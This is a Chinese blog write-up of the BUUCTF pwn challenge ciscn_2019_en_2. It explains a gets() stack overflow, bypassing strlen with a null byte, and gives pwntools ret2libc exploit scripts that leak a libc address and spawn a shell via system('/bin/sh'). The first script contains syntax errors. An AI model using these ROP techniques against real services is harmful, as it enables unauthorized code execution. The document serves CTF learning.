[CTF]BUUCTF-PWN-ciscn_2019_en_2

已于 2023-04-12 20:07:33 修改
阅读量261 收藏 3
点赞数 2
分类专栏: PWN 文章标签: 网络安全 c语言 python
于 2023-04-11 09:16:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53394081/article/details/130075559
版权

程序分析

main

在这里插入图片描述

  • __isoc99_scanf("%d", &v4); - 从标准输入读取一个整数并存储到变量v4中。
  • getchar(); - 读取并丢弃标准输入中的一个字符。

程序的逻辑大致如下:

  1. 打印欢迎信息,并调用函数begin()。

  2. 进入一个无限循环,循环内部有一个读取输入的循环,如果读取到的整数为2,重新调用函数begin()。

  3. 如果读取到的整数为3,打印"Bye!"并退出程序。

  4. 如果读取到的整数不是1或2或3,则打印"Something Wrong!"并退出程序。

  5. 如果读取到的整数为1,则调用函数encrypt(),然后再次调用函数begin()

    下面看一下encrypt函数

  • 因此,只有输入1有用,encrypt较为重要
encrypt

在这里插入图片描述

  • 程序通过一个变量x来控制当前遍历到字符串s的哪个位置,每次循环先将x强制转换为无符号整型,赋值给变量v0。然后判断v0是否大于或等于s的长度strlen(s)

  • v0的值(即遍历加密前的明文字符串s的索引)大于等于s字符串(用户输入的0)的长度(即已经遍历完了整个字符串),则退出循环

  • strlen(s)是一个字符串函数,用于计算一个字符串的长度。如果v0已经等于或大于s字符串的长度,说明已经对整个字符串进行了加密操作,循环可以结束了

解题思路

  • get()存在栈溢出漏洞

  • 用\x00绕过strlen(),形成栈溢出

  • 泄露puts()地址,打常规ret2libc

利用栈溢出泄露puts地址
from pwn import*

r = process()
lib = ELF()
elf = ELF()

puts_plt = elf.plt['puts']
puts_got = elf.got["puts"]
rdi_addr = 0x400c83
main_addr = elf.symbols["main"]
ret = 0x4006b9

payload = b'\x00' + b'M'(0x50+8-1) + p64(rdi_addr) + p64(puts_got) +p64(puts_plt) + p64(main_addr)
r.recv()
r.sendline(b"1")
r.recv()
r.sendline(payload)
r.recvline()
r.recvline()
puts_addr = u64(r,recv(6).ljust(8),b'\x00'))
//从远程连接(通过 r 变量)接收6字节的数据,并将其填充为8字节(使用 ljust(8) 方法),然后将这个8字节的数据转换成一个64位的整数(使用 u64 函数),并将结果存储在 puts_addr 变量中。在将8字节数据转换成64位整数时,使用了一个参数 b'\x00',该参数指示转换是以小端字节序进行的。因此,如果远程连接发送的6个字节的数据不足8个字节,那么该代码将使用 \x00 字节填充剩余的2个字节。
print("puts_addr:" + hex(puts_addr))
完整exp
from pwn import*
from LibcSearcher import*
context(os='linux', arch='amd64', log_level='debug')

p=remote('node4.buuoj.cn',26265)
elf=ELF('/home/kongxiangheng/pwnttt/ciscn_2019_en_2' )

rdi_addr=0x400c83
//400c83 : pop rdi ; ret

ret_addr=0x4006b9
//4006b9 : ret

puts_plt=elf.sym["puts"]
__libc_start_main=elf.got["__libc_start_main"]
main_addr=elf.sym['main']

p.recv()
p.sendline(b'1')
//输入1有效,得以继续
payload1=b'\0'+b'A'*0x57+p64(rdi_addr)+p64(__libc_start_main)+p64(puts_plt)+p64(main_addr)
//用x00绕过strlen(s),形成栈溢出
p.recvuntil(b'Input your Plaintext to be encrypted\n')
p.sendline(payload1)

p.recvline()
p.recvline()
__main_addr=u64(p.recvuntil(b'\n')[:-1].ljust(8,b'\0'))

libc=LibcSearcher("__libc_start_main",__main_addr)
base=__main_addr-libc.dump('__libc_start_main')
system_addr=base+libc.dump('system')
binsh_addr=base+libc.dump('str_bin_sh')

p.recv()
p.sendline(b'1')
payload2=b'\0'+b'A'*0x57+p64(ret_addr)+p64(rdi_addr)+p64(binsh_addr)+p64(system_addr)
//调用函数时第一个参数通常会被放到 rdi 寄存器中
//在调用 system 函数之前,先将 /bin/sh 字符串的地址放到 rdi 寄存器中,作为 system 函数的参数。这样 system("/bin/sh") 函数就会被执行,从而得到一个 shell

p.recvuntil(b'encrypted\n')
p.sendline(payload2)

p.interactive()
ksw0rd
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
[BUUCTF-pwn]——ciscn_2019_en_2
Y_peak的博客
02-10 807
[BUUCTF-pwn]——ciscn_2019_en_2 题目地址: https://buuoj.cn/challenges#ciscn_2019_en_2 题目: 这是一道和之前一摸一样的题,请点击
BUUCTF-PWN-ciscn_2019_en_2
Henlenl的博客
05-19 249
文章目录查看文件信息IDA 分析exp 查看文件信息 amd 64位系统 NX保护 IDA 分析 nc 程序连接一下 没什么东西 给了几个选择的按钮 IDA 64分析一波 发现其实程序就只能选择1 而且关键函数是encrypt 我们进去看一下 所以 只要让 var[13] = 17就行了 exp 但是 这里要说明一下 32位程序是能直接去内存中寻址执行的 64位就是要依靠寄存器来寻址 然后找到地址返回给程序去执行的 ...
[BUUCTF]PWN9——ciscn_2019_en_2
mcmuyanga的博客
08-26 563
[BUUCTF]PWN9——ciscn_2019_en_2 题目网址:https://buuoj.cn/challenges#ciscn_2019_en_2 步骤: 例行检查,64位,开启了NX保护 nc一下看看程序的执行大概流程,看这个模样很眼熟 ida查看了一下程序,确定了跟之前的 [BUUCTF]PWN6——ciscn_2019_c_1 一样,具体的看那题的链接 exp: from pwn import* from LibcSearcher import* r=remote('node3.buu
BUUCTF - PWNciscn_2019_en_2
古月浪子的博客
03-25 1182
不知道是不是题目重复了,反正我的另一篇博文的exp可以直接copy过来打通… 传送门:【BUUCTF - PWNciscn_2019_c_1 附件:ciscn_2019_en_2
BUUCTF ciscn_2019_en_2
红叶的博客
10-28 521
对输入的字符串进行了加密,但是不知道为什么不需要绕过就能成功。使用gdb调试会被加密,因此使用IDA Pro查看变量大小。因为题目部署在Ubuntu18,因此需要栈平衡。
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
ctf-field-guide.zip_ctf_pdf
09-23
ctf介绍及相关培训介绍 学习ctf的注意事项
2020-HackIM_ctf_hackim-ctfwriteup_
09-28
这是hackim-ctf的writeup
BUUCTF-Pwn-ciscn_2019_en_2
餐桌上的猫
03-04 122
题目截图
buuctf|ciscn_2019_en_2 1
m0_64236521的博客
05-02 641
ciscn_2019_en_2 1 下载后我重命名为pwn_14了 checksec一下 nx开启,可以栈溢出 64位,用ida看看 分析下,只有输入‘1’有用,即encrypt函数较为重要,进入encrypt 有gets(s),可以进行栈溢出,没有找到后门函数。 那基本思路有了,这里可以栈溢出,但要绕过strlen判断,之后就是基本的ROP,ret2libc。 exp如下 from pwn import* from LibcSearcher import* context(os='linux', ar
ciscn_2019_en_2
z1r0的博客
12-04 474
ciscn_2019_en_2 查看保护 和前面一个题撞了,漏洞点在encrypt这个函数里。用\0来截断strlen绕过加密。ret2libc from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 25248) else: r = process(file
CTFciscn_2019_en_2
凉水的博客
01-26 3759
解题思路: 1 先反编译,粗略看了下,溢出点应该在encrypt函数里(只贴关键部分): void encrypt(char *__block,int __edflag) { size_t sVar1; long lVar2; ulong uVar3; undefined8 *puVar4; undefined8 local_58 [9]; ... *(undefined2 *)puVar4 = 0; puts("Input your Plaintext to be encr
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
最新发布
05-13
2. 经过试错法,发现可以使用双字节绕过来绕过筛选器,构造如下 URL: ``` http://xxx.com/index.php?file=..%252Fflag ``` 这样就可以成功包含 flag.php 文件,从而获取 flag。 需要注意的是,这种漏洞具有...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值